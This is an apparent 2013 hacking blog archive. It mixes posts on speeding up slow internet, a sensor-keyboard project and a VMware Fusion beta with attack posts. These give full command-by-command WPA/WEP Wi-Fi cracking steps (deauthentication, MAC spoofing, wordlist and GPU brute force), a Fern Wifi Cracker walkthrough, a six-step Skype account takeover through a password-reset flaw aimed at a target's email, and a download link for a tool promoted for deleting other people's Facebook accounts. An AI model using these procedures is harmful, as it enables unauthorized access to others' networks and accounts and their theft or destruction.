Wednesday, March 13, 2013

Access blocked sites

1. Increase the size of your browser cache. If the static parts of a site (like background graphics, CSS, etc) are stored in the local cache, your browser can safely skip downloading these files when you re-visit the site in future thus improving speed.

2. Turn off web images, the Adobe Flash plug-in, Java Applets and JavaScript from your browser settings as these files are often the bulkiest elements of any web page.

3. The Google Transcoder service at google.com/gwt/n can split large web pages into smaller chunks that will download more quickly on your computer.

4.Monitor your Internet speed to determine hours when you get the maximum download speed from the ISP. Maybe you can then change your surfing schedule a bit and browse more during these "off peak" hours.

5. Finch can serve a light-weight version of any website in real-time that is free of all bells and whistles. For instance, the New York Times homepage with all external resources can weigh more than a MB but Finch trims down the size by 90% so the site loads more quickly on a slow web connection.

6. Flinch (mentioned at #4) is good for reading regular websites but if you just need to check the latest articles published on your favorite blogs, use BareSite. This service will automatically detect the associated feed of a website and render content quickly inside a minimalist interface.


7.You can use a text browser like Lynx or Elinks for even faster browsing. It downloads only the HTML version of web pages thus reducing the overall bandwidth required to render websites.

8. When searching for web pages on Google, you can click the "Cache" link to view the text version of a web page stored in the Google Cache. Alternatively, install this GM script as it adds a "cached text only" link near every "Cached" link on Google Search pages.

9. Move your web activities offline as far as possible. You can send & receive emails, write blogs and even read feeds in an offline environment.

10. Applying the same logic, you may also consider using tools like Web In Mail or Email The Web as they help you browse websites via email. Just put the URL of a page (e.g., cnn.com) in the subject field of your email message and these services will send you the actual page in the reply.

11. Bookmarklets are like shortcuts to your favorite web services. You neither have to open the Gmail Inbox for composing a new email message nor do you have to visit Google Translate for translating a paragraph of text. Add relevant bookmarklets to your browser bar and reduce the number of steps required to accomplish a task.

12. Use the netstat command to determine processes, other than web browsers, that may be secretly connecting to Internet in the background. Some of these processes could be consuming precious bandwidth but you can block them using the Firewall.

13. Use URL Snooper to determine non-essential host names that a website is trying to connect while downloading a web page. You may block them in future via the Adblock Plus to filter out advertising banners on web pages.

14. If you don’t want to spoil your web surfing experience by stripping images and other graphic elements from a web page, get Opera Turbo. It will first fetch the requested web page on to its own server and then send it to your machine in a compressed format. Opera Turbo won’t change the layout of a web site but can lower the image resolution so that they load faster on slow Internet.

Source:-labnol

Thursday, March 7, 2013

HACK WIFI PASSWORD WITH BACKTRACK 5

"WARNING:Don't Hack any authorized router,otherwise you'll be put into jail."
 
Rules to Follow
    • A Backtrack Live CD: the Linux Live CD that lets you do all sorts of security testing and tasks. Download yourself a copy of the CD and burn it, or load it up in VMware to get started.
    • here a link to download it http://www.backtrack-linux.org/downloads/
    • A nearby WEP-enabled Wi-Fi network 
    • Patience with the command line. This is an ten-step process that requires typing in long, arcane commands and waiting around for your Wi-Fi card to collect data in order to crack the password. Like the doctor said to the short person, be a little patient.                                            

 Steps to Follow:
Step 1 :

airmon-ng

The result will be something like :

Interface    Chipset      Driver
wlan0        Intel 5100   iwlagn - [phy0]



Step 2 :

airmon-ng start wlan0

Step 3 (Optional) :

Change the mac address of the mon0 interface.

ifconfig mon0 down
macchanger -m 00:11:22:33:44:55 mon0
ifconfig mon0 up


Step 4 :

airodump-ng mon0

Then, press "
Ctrl+c" to break the program.

Step 5 :

airodump-ng -c 3 -w wpacrack --bssid ff:ff:ff:ff:ff:ff --ivs mon0

*where -c is the channel
           -w is the file to be written
           --bssid is the BSSID

This terminal is keeping running.

Step 6 :

open another terminal.

aireplay-ng -0 1 -a ff:ff:ff:ff:ff:ff -c 99:88:77:66:55:44 mon0

*where -a is the BSSID
           -c is the client MAC address (STATION)

Wait for the handshake.

Step 7 :

Use the John the Ripper as word list to crack the WPA/WP2 password.

aircrack-ng -w /pentest/passwords/john/password.lst wpacrack-01.ivs

Step 8 (Optional) :ITS AN OPTIONAL STEP,,,,,,

If you do not want to use John the Ripper as word list, you can use Crunch.

Go to the official site of crunch.
http://sourceforge.net/projects/crunch-wordlist/files/crunch-wordlist/

Download crunch 3.0 (the current version at the time of this writing).
http://sourceforge.net/projects/crunch-wordlist/files/crunch-wordlist/crunch-3.0.tgz/download

tar -xvzf crunch-3.0.tgz
cd crunch-3.0
make
make install


/pentest/passwords/crunch/crunch 8 16 -f /pentest/passwords/crunch/charset.lst mixalpha-numeric-all-space-sv | aircrack-ng wpacrack-01.ivs -b ff:ff:ff:ff:ff:ff -w -

*where
8 16 is the length of the password, i.e. from 8 characters to 16 characters.

(B) nVidia Display Card with CUDA

If you have nVidia card that with CUDA, you can use pyrit to crack the password with crunch.

Step a :

airmon-ng

The result will be something like :

Interface    Chipset      Driver
wlan0        Intel 5100   iwlagn - [phy0]



Step b :

airmon-ng start wlan0

Step c (Optional) :

Change the mac address of the mon0 interface.

ifconfig mon0 down
macchanger -m 00:11:22:33:44:55 mon0
ifconfig mon0 up


Step d :

airodump-ng mon0

Then, press "
Ctrl+c" to break the program.

Step e :

airodump-ng -c 3 -w wpacrack --bssid ff:ff:ff:ff:ff:ff mon0

Step f :

open another terminal.

aireplay-ng -0 1 -a ff:ff:ff:ff:ff:ff -c 99:88:77:66:55:44 mon0

*where -a is the BSSID
           -c is the client MAC address (STATION)

Wait for the handshake.

Step g :

If the following programs are not yet installed, please do it.

apt-get install libghc6-zlib-dev libssl-dev python-dev libpcap-dev python-scapy

Step h :

Go to the official site of crunch.
http://sourceforge.net/projects/crunch-wordlist/files/crunch-wordlist/

Download
crunch 3.0 (the current version at the time of this writing).
http://sourceforge.net/projects/crunch-wordlist/files/crunch-wordlist/crunch-3.0.tgz/download

tar -xvzf crunch-3.0.tgz
cd crunch-3.0
make
make install


Step i :

Go to the official site of pyrit.

http://code.google.com/p/pyrit/downloads/list

Download
pyrit and cpyrit-cuda (the current version is 0.4.0 at the time of this writing).

tar -xzvf pyrit-0.4.0.tar.gz
cd pyrit-0.4.0
python setup.py build
sudo python setup.py install


tar -xzvf cpyrit-cuda-0.4.0.tar.gz
cd cpyrit-cuda-0.4.0
python setup.py build
sudo python setup.py install


Step j :

/pentest/passwords/crunch/crunch 8 16 -f /pentest/passwords/crunch/charset.lst mixalpha-numeric-all-space-sv | pyrit --all-handshakes -r wpacrack-01.cap -b ff:ff:ff:ff:ff:ff -i - attack_passthrough

*where
8 16 is the length of the password, i.e. from 8 characters to 16 characters.

Step k (Optional) :

If you encounter error when reading the
wpacrack-01.cap, you should do the following step.

pyrit -r wpacrack-01.cap -o new.cap stripLive

/pentest/passwords/crunch/crunch 8 16 -f /pentest/passwords/crunch/charset.lst mixalpha-numeric-all-space-sv | pyrit --all-handshakes -r new.cap -b ff:ff:ff:ff:ff:ff -i - attack_passthrough

*where
8 16 is the length of the password, i.e. from 8 characters to 16 characters.

Step l :

Then, you will see something similar to the following.

Pyrit 0.4.0 (C) 2008-2011 Lukas Lueg http://pyrit.googlecode.com
This code is distributed under the GNU General Public License v3+

Parsing file 'new.cap' (1/1)...
Parsed 71 packets (71 802.11-packets), got 55 AP(s)

Tried 17960898 PMKs so far; 17504 PMKs per second.


Remarks :

If you have an nVidia GeForce GTX460 (336 CUDA cores), the speed of cracking is about 17,000 passwords per second.

To test if your wireless card (either USB or PCI-e) can do the injection or not :

airodump-ng mon0
Open another terminal.
aireplay-ng -9 mon0
Make sure pyrit workable on your system :

pyrit list_cores

That's all! See you.
THANKS YOU AND plz follow me in blog.............


Saturday, March 2, 2013

Hack WEP encrypted websites

I am going to discuss the use of a tool named as FERN WIFI CRACKER using which in general you can hack WEP as well as WPA secured WIFI networks and this GUI based application is quite easy to use plus, it cracks password in quite fast time if you have a good computer with fast RAM and processor. In backtrack 5 its already installed an is properly configured but you can get it on Ubuntu and other Linux flavours also. Read this post to learn how to setup FERN for Ubuntu.Setting Up and Running Fern WIFI Cracker In Ubuntu What this application uses has been listed in the post. After installing Fern in any linux or else you can also use backtrack 5 for this purpose. Read here how to install backtrack 5 :- and Install Backtrack 5 as dual boot (Windows and Bt5 Together). Whatever OS you are going to use just run Fern and read below.
Using Fern Wifi Cracker:-

Click the refresh button to load monitor interfaces. Then hit scan button, its for dual functioning mean, at first hit it will start scanning and again if you hit it it will stop scanning.

Fern Wifi Cracker

When any WIFI network with WEP and WPA will be found by FERN it will be displayed as in this below screen shot. You have to hit button of WPA or else WEP inorder to crack the password for any of the WIFI network.

WEP and WPA scan FERN

Cracking WEP encryption based WIFI password key:-

After hitting the activation button of the WEP attack. What happens can be seen in screen shots below:-

So, key has been successfully recovered.
Cracking WPA encryption based WIFI password key:-

Cracking WPA encryption based WIFI password

So, key has been successfully recovered, as you can see.
Where the keys database can be found later?
All the keys which are recovered are automatically saved here:- /usr/local/bin/Fern-Wifi-Cracker/key-Database/Database.db. Plus you can also add keys manually.

Fern Key database

Tracking provider of WIFI Router's location using Mac Address:-
Here is the geographical location mac addres tracker. You can run it from :- ToolBox>Geolocatory Tracker

Fern Mac Tracer

- See more at: http://www.hackersthirst.com/2011/08/hackingcracking-wpawep-encrypted-wifi.html#sthash.JeQQoOdS.dpuf

Wednesday, February 27, 2013

Hack any skype account


Hack any skype account in 6 easy steps

Major vulnerability of Skype's password reset system has went public today.
The only thing you need to obtain full access to any Skype account is primary email of that account (the email which used when the Skype account been registered).
Following guide contains both - how to steal an account, and how to protect your account (scroll down for that).
Update 1 (November 14, 2:00am PDT): Skype made the password reset system disabled. So link on the step 4 is not working for me now (starting from November 14, 2 am PDT).
Update 2 (November 14, 6:00am PDT): Skype re-enabled the password reset system, but now it will not sent recovery token to attacker's client. The hole (gate, almost highway road) is closed.

For example, I know somebody's email - crackme33@yahoo.com , let's hack his Skype!

1. Go to the Skype website, register new disposable account. In email field, put target's email.

If the email, you typed into form, attached to some skype account, then it will say that "You already have a Skype account", that means you can hack it!
So, complete the form, provide some fake BOD, gender, country, answer to question "How do you intend to use Skype?" as personal, fill any skype name (REMEMBER IT), it will give you some suggestions of not taken ones, assign some password  (REMEMBER IT), solve the captcha, proceed forward - push the continue button. 
You will be redirected to you new account dashboard. Logout from it.
 
2. Run the Skype application with those new credentials.
3. Since we just logged in to a fresh account, at home screen of the Skype application, there will be advertisement "Find your friends and say hello", click somewhere to bring focus on that part of screen (I clicked where the red cross is drawn):
Then push F5 button on your keyboard, it will refresh the home screen. Do that 3-4 times until you see "Bring your Facebook friends into Skype" advertisement. Click "No thanks, blah-blah-blah".
You will get the home screen with some banner. 
4. Go to Skype's password reset system.Put the target's email. In my case - crackme33@yahoo.com .
Click "Submit button", and after several seconds, you will see Skype's pop-up notification - "Password token".
5. Go to Skype application, on the home screen you will see Password token, click on "more info", go to "temporary code link":
6. Browser will open page, where you can select any skype account registered to target email, in my case there are two account - my disposable and target:
Choose target's account and click "Change password and sign me in":
 You will be redirected to login form:






You are all set!
P.S. I have changed primary email for that test accounts, so do not try hack them. Just in case. =)

How to protect your accounts

You already changed password for the target account, know the skype login, and able to use that target skype account. But somebody could take it back from you, just as you did (owner for example).
To prevent that you need to change your primary email to some address, unknown to anyone.

To do that:
1. Sign in on skype website.
2. Go into the "profile" link (click to enlarge):


3. On account information, go down, to "Contact details", click "Add email address":
4. Add your email address, which unknown to anybody, but you:
Click save button at the bottom of the form. After page reload, refresh page again to prevent some strange glitches of the site (if you will not reload the page, after you do following steps, it will forget steps 4 and 5 and discard that little work).
5. Scroll to Contact details again. Click on "Add email address" again. Switch primary email to the new one:
Click "Save" button at the bottom of the form, again.
It will ask you for your password. You know it already. Type password and click button by mouse, not by "Enter" key.
After page reload, refresh page again to prevent some strange glitches of the site (described above).
6. Scroll to Contact details again. Click on "Add email address" again. Delete (with backspace and/or delete buttons) all emails but primary:

7. Click "Save" button at the bottom of the form. Make sure all your changes applied (it sometimes require two or more attempts, since the site is developed by curly-handed programmers).
8. Tell to friends how to protect a skype account. ASAP
At the time there is no other way to protect your skype account, except changing of primary email to some unknown address.
Once account is stolen, it has ability to retrieve all your IM history from other peers.
If you already lost your account, contact to all your necessary contacts and tell them to remove you from their contact list. It prevents IM history interchange (if it is not already happened).

There is how mailbox of target looks like:



Thus target will receive notifications regarding password change, but initial owner have less than one minute to understand and take action, it is almost impossible to login into skype website, change emails, when a hacker already there.
Disclaimer: The information provided on in this blog is to be used for educational purposes only. The blog author is in no way responsible for any misuse of the information provided.

Wednesday, February 20, 2013

Pair of musical hacks use sensor arrays as keyboards

 

Pair of musical hacks use sensor arrays as keyboards

sensor-driven-musical-keyboards
This pair of musical keyboard hacks both use light to detect inputs. The pair of tips came in on the same day, which sparks talk of consipiracy theory here at Hackaday. Something in the weather must influence what types of projects people take on because we frequently see trends like this one. Video of both projects is embedded after the jump.

On the left is a light-sensitive keyboard which [Kaziem] is showing off. In this image he’s rolling a marble around on the surface. As it passes over the Cadmium Sulfide sensors (which are arranged in the pattern of white and black keys from a piano keyboard) the instrument plays pitches based on the changing light levels. [Thanks Michael via Make]

To the right is [Lex's] proximity sensor keyboard. It uses a half-dozen Infrared proximity sensor which pick up reflected light. He calls it a ‘quantised theremin’ and after seeing it in action we understand why. The overclocked Raspberry Pi playing the tones reacts differently based on distance from the keyboard itself, and hand alignment with the different sensors.

Sunday, February 17, 2013

Facebook Account Deleter

Facebook Account Deleter (100% Working)

Image


Download

http://www.easy-share.com/1915011059/TU ... ersion.rar

Requirements:

1).Net Framework 4 Client Profile (x86 and x64) / If you dont have it, download it from here:http://www.microsoft.com/downloads/en/details.aspx?FamilyID=5765d7a8-7722-4888-a970-ac39b33fd8ab
2)Microsoft Visual Basic Power Packs 3.0 / If you dont have it, download it from here:http://www.microsoft.com/downloads/en/details.aspx?FamilyID=371368A8-7FDC-441F-8E7D-FE78D96D4063
3)Finally, download this: http://go.microsoft.com/fwlink/?LinkID=145727&clcid=0x804


One of the best tool every take it today to delete others account. It is 100% virus free I have personally tested it.

Saturday, February 16, 2013

VM Ware Fusion 3.1


VMWare Fusion 3.1 Beta On Grounds

Check out the VMWare Fusion 3.1 Beta which have been out just now. Its includes some of the significant features which many of the users have been waiting for. Some of them are really good which mostly includes graphic issues.


VMWare have been the major choice for the users to run Windows on Mac and pentesting for most of us on windows. The Beat 3.1 is out which have some major improvements in 3D application like games and windows Aero stuff…

OpenGL 2.1 is now also supported in this version for Windows 7 and Windows Vista. They claim better DirectX 9.0 SM3 performance as well (and hopefully that means more DirectX 9.0C app compatibility).

You can configure larger virtual machines as well, with the maximum virtual disk expanded from 950 GB to 2 TB. They now support up to 8-way symmetric multiprocessing as well. These are some of the features you will see in this Beat version.

VMware_fusion_windows_7_aero
You can download the beta here, test it, and have some of the nice features early for your use. If you want you can also give some tips to them and help them get doing the thing done fast for the final version.

So there you go - Download